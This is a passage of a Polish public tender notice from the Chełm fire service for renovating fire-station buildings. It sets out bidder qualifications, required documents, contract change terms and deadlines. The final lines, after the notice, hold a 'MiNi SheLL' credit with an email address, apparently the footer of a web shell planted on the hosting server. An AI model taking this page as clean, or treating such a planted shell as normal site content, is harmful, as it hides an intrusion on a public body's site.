<br/>c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej,<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych,<br/>d)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.,<br/>	potwierdzi wysokość posiadanych środków finansowych lub zdolność kredytową w kwocie co najmniej 350.000,00 zł (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych) w okresie nie wcześniejszym niż jeden miesiąc przed upływem terminu składania ofert,<br/>albo;<br/>	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 350.000,00 zł. / dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych/<br/>3.	Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu, <br/>o których mowa powyżej w ust. 2 pkt. a-d, Zamawiający uzna, że Wykonawca spełnia owe warunki, gdy wykaże, że polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go <br/>z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który <br/>w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że warunki udziału w postępowaniu określone przez Zamawiającego spełniają łącznie, <br/>z tym, że żaden z Wykonawców nie może podlegać wykluczeniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu i spełniają warunki udziału w postępowaniu na podstawie art. 57 ust. 2 ustawy p.z.p. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w stosunku do żadnego z Wykonawców nie może być podstaw do wykluczenia. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy to <br/>w okresie dotychczasowej działalności, wykonali co najmniej 2 usługi remontowe polegające na remoncie obiektu budowlanego w zakresie objętym niniejszą specyfikacją (t.j. roboty remontowe obiektów straży pożarnej, wymiana instalacji elektrycznych i instalacji teletechnicznych, aranżacja wnętrza ww. obiektów)<br/>o wartości netto minimum 100.000,00 zł każda, potwierdzone, że zostały one wykonane należycie (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych),<br/>b)	zapewnią do realizacji przedmiotowego zamówienia odpowiedni potencjał techniczny potwierdzony wykazem niezbędnego sprzętu i urządzeń zapewniających realizację zamówienia, <br/>c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej,<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych,<br/>d)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.,<br/>	potwierdzi wysokość posiadanych środków finansowych lub zdolność kredytową w kwocie co najmniej 350.000,00 zł (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych) w okresie nie wcześniejszym niż jeden miesiąc przed upływem terminu składania ofert,<br/>albo;<br/>	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 350.000,00 zł. / dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych/<br/>3.	Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu, <br/>o których mowa powyżej w ust. 2 pkt. a-d, Zamawiający uzna, że Wykonawca spełnia owe warunki, gdy wykaże, że polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go <br/>z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który <br/>w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że warunki udziału w postępowaniu określone przez Zamawiającego spełniają łącznie, <br/>z tym, że żaden z Wykonawców nie może podlegać wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu i spełniają warunki udziału w postępowaniu na podstawie art. 57 ust. 2 ustawy p.z.p. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w stosunku do żadnego z Wykonawców nie może być podstaw do wykluczenia. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy to <br/>w okresie dotychczasowej działalności, wykonali co najmniej 2 usługi remontowe polegające na remoncie obiektu budowlanego w zakresie objętym niniejszą specyfikacją (t.j. roboty remontowe obiektów straży pożarnej, wymiana instalacji elektrycznych i instalacji teletechnicznych, aranżacja wnętrza ww. obiektów)<br/>o wartości netto minimum 100.000,00 zł każda, potwierdzone, że zostały one wykonane należycie (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych),<br/>b)	zapewnią do realizacji przedmiotowego zamówienia odpowiedni potencjał techniczny potwierdzony wykazem niezbędnego sprzętu i urządzeń zapewniających realizację zamówienia, <br/>c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej,<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych,<br/>d)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.,<br/>	potwierdzi wysokość posiadanych środków finansowych lub zdolność kredytową w kwocie co najmniej 350.000,00 zł (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych) w okresie nie wcześniejszym niż jeden miesiąc przed upływem terminu składania ofert,<br/>albo;<br/>	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 350.000,00 zł. / dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych/<br/>3.	Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu, <br/>o których mowa powyżej w ust. 2 pkt. a-d, Zamawiający uzna, że Wykonawca spełnia owe warunki, gdy wykaże, że polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go <br/>z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który <br/>w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że warunki udziału w postępowaniu określone przez Zamawiającego spełniają łącznie, <br/>z tym, że żaden z Wykonawców nie może podlegać wykluczeniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert,<br/>2. aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>3. aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalnosci gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 114 pkt. 2 ustawy p.z.p, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 114 pkt. 3 p.z.p.<br/><br/>Wykonawca, którego oferta została najwyżej oceniona na wezwanie zamawiającego na podstawie art. 112 ustawy p.z.p. W celu potwierdzenia spełnienia warunków udziału <br/>w postępowaniu składa w wyznaczonym terminie, nie krótszym niż 5 dni:<br/><br/>1. Aktualny na dzień złożenia wykaz robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, wraz z podaniem ich rodzaju, wartości daty miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie.<br/>2. Aktualny na dzień złożenia wykaz osób, skierowanych przez Wykonawcę do realizacji<br/> zamówienia publicznego odpowiedzialnych za kierowanie robotami budowlanymi wraz<br/> z informacją na temat kwalifikacji zawodowych, uprawnień oraz podstawie do<br/> dysponowania tymi osobami (złącznik Nr 8).<br/>3. Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej<br/> wysokość posiadanych środków finansowych lub zdolności kredytowej Wykonawcy<br/> w wysokości nie niższej niż 350 000, 00 zł. wystawionej nie wcześniej niż 1 miesiąc przed<br/> upływem terminu składania ofert.<br/>4. Aktualny dokument potwierdzający posiadanie przez Wykonawcę ubezpieczenia <br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejsza niż 350 000,00 zł. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Aktualny na dzień złożenia wykaz robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, wraz z podaniem ich rodzaju, wartości daty miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie.<br/>2. Aktualny na dzień złożenia wykaz osób, skierowanych przez Wykonawcę do realizacji<br/> zamówienia publicznego odpowiedzialnych za kierowanie robotami budowlanymi wraz<br/> z informacją na temat kwalifikacji zawodowych, uprawnień oraz podstawie do<br/> dysponowania tymi osobami (złącznik Nr 8).<br/>3. Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej<br/> wysokość posiadanych środków finansowych lub zdolności kredytowej Wykonawcy<br/> w wysokości nie niższej niż 350 000, 00 zł. wystawionej nie wcześniej niż 1 miesiąc przed<br/> upływem terminu składania ofert.<br/>4. Aktualny dokument potwierdzający posiadanie przez Wykonawcę ubezpieczenia <br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejsza niż 350 000,00 zł.<br/><br/>Punkty 3 i 4 stosuje się zamiennie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.<br/>2.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.<br/>3.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.<br/>4.	Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona składa w oryginale lub poświadczone notarialnie lub opatrzone adnotacją „za zgodność z oryginałem” pieczęcią Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania prawa do podpisywania oferty i składania ewentualnych wyjaśnień. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.<br/>2.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.<br/>3.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.<br/>4.	Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona składa w oryginale lub poświadczone notarialnie lub opatrzone adnotacją „za zgodność z oryginałem” pieczęcią Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania prawa do podpisywania oferty i składania ewentualnych wyjaśnień.<br/>5.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w rozdziale 6 SWZ oraz odpowiednio dla tam wymienionych równoważnych, lub którzy złożyli te dokumenty, ale zawierają błędy, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub/i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. <br/>6.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy <br/>w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania także oświadczenie <br/>o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia. Podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej. Dokument pełnomocnika należy przedstawić w formie oryginału. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie <br/>z podmiotem występującym jako pełnomocnik. <br/>7.	Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.<br/>8.	Zamawiający może żądać przedstawienia w wyznaczonym przez siebie terminie oryginału lub notarialnie potwierdzonej kopii dokumentu, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4.	Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zmiana dotyczy terminu realizacji umowy. Termin realizacji umowy ulegnie przesunięciu w wypadku wystąpienia opóźnień wynikających z:<br/>a) przestojów i opóźnień zawinionych przez Zamawiającego,<br/>b) działania siły wyższej (np. klęski żywiołowej, strajku, pandemii) mającej <br/> bezpośredni wpływ na terminowość wykonywanych robót,<br/>d) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,<br/>e) wydłużenia czasu oczekiwania na uzyskanie pozwoleń lub decyzji administracyjnych i uzgodnień wymaganych dla wykonania umowy, jeżeli łączny czas oczekiwania na pozwolenia i decyzje administracyjne przekroczy łącznie 21 dni.<br/><br/>W przedstawionych powyżej przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji, z tym, że maksymalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju. <br/>5.	Zgodnie z treścią art. 455 ustawy prawo zamówień publicznych dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zmiana dotyczy wykonania innych czynnosci nie mających charakteru prac opisanych w pierwotnym obmiarze i kosztrysie ofertowym. Warunkiem dokonania takiej zmiany jest wystąpienie konieczności wykonania prac adaptacyjnych, które zwiększają walory funkcjonalne, sanitarne, higieniczne, techniczne lub estetyczne obiektów. Ponadto zmiana wykonawcy prac ekonomicznie nie byłaby uzasadniona i powodowałaby niedogodność lub zwiększenie kosztów dla Zamawiającego. Wartość zmiany nie może przekroczyć 10 % wartosci zamówienia określonej w kosztorysie ofertowym Wykonawcy. Informacja o konieczności wykonania ww. robót potwierdzona być musi w protokole robót dodatkowych, zatwierdzonym pisemnie przez, Zamawiającego. <br/>6.	W związku z zaistnieniem okoliczności wymienionych w pkt. 5 określona w niniejszej umowie cena, może zostać zmniejszona lub podwyższona. W przypadku podwyższenia ceny umowy jej wysokość każdorazowo powinna być ustalona z Zamawiającym jednak nie może przekraczać 10 % wartości pierwotnej umowy.<br/>7. Wykonawca nie może żądać podwyższenia wynagrodzenia, jeżeli wykonał prace o których mowa w pkt. 5 bez uzyskania pisemnej zgody Zamawiającego.<br/>8.	Zamawiający przewiduje możliwość zmiany umowy w zakresie kluczowej obsady osobowej ekipy remotowej podczas realizacji przedmiotowego zamówienia jeżeli nowo wyznaczona osoba posiadać będzie kwalifikacje odpowiadające wymaganiom określonym przez Zamawiającego w specyfikacji warunków zamówienia oraz zaistniałe zmiany będą wywołane okolicznościami, których nie można było przewidzieć w chwili podpisania umowy .<br/>9.	Wszelkie zmiany zapisów umowy winny być dokonywane w formie pisemnej (aneksu do umowy) pod rygorem ich nieważności.<br/>10.	Warunki płatności: <br/>10.1. Płatność z tytułu robót budowlanych, określonych w umowie realizowana będzie na<br/> podstawie prawidłowo wystawionej faktury - po uprzednim odebraniu robót.<br/>10.2. Płatność będzie realizowana w PLN, koszty obsługi bankowej powstałe w banku<br/> zamawiającego pokrywa Zamawiający, koszty powstałe poza bankiem Zamawiającego<br/> pokrywa Wykonawca. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma ZETOPZP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-17 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Strona internetowa jest stroną własną zamawiającego i ma następujący adres: www.strazchelm.pl<br/>2.	Adres poczty elektronicznej: km_chelm@straz.lublin.pl.<br/>3.	Adres postępowania na platformie, w którym Zamawiający przewidział możliwość korespondencji z Wykonawcami: https//przetargi.lubleskie.straz.gov.pl/-&gt;”JEDNOSTKI”-&gt;”KM PSP Chełm”

Creat By MiNi SheLL
Email: jattceo@gmail.com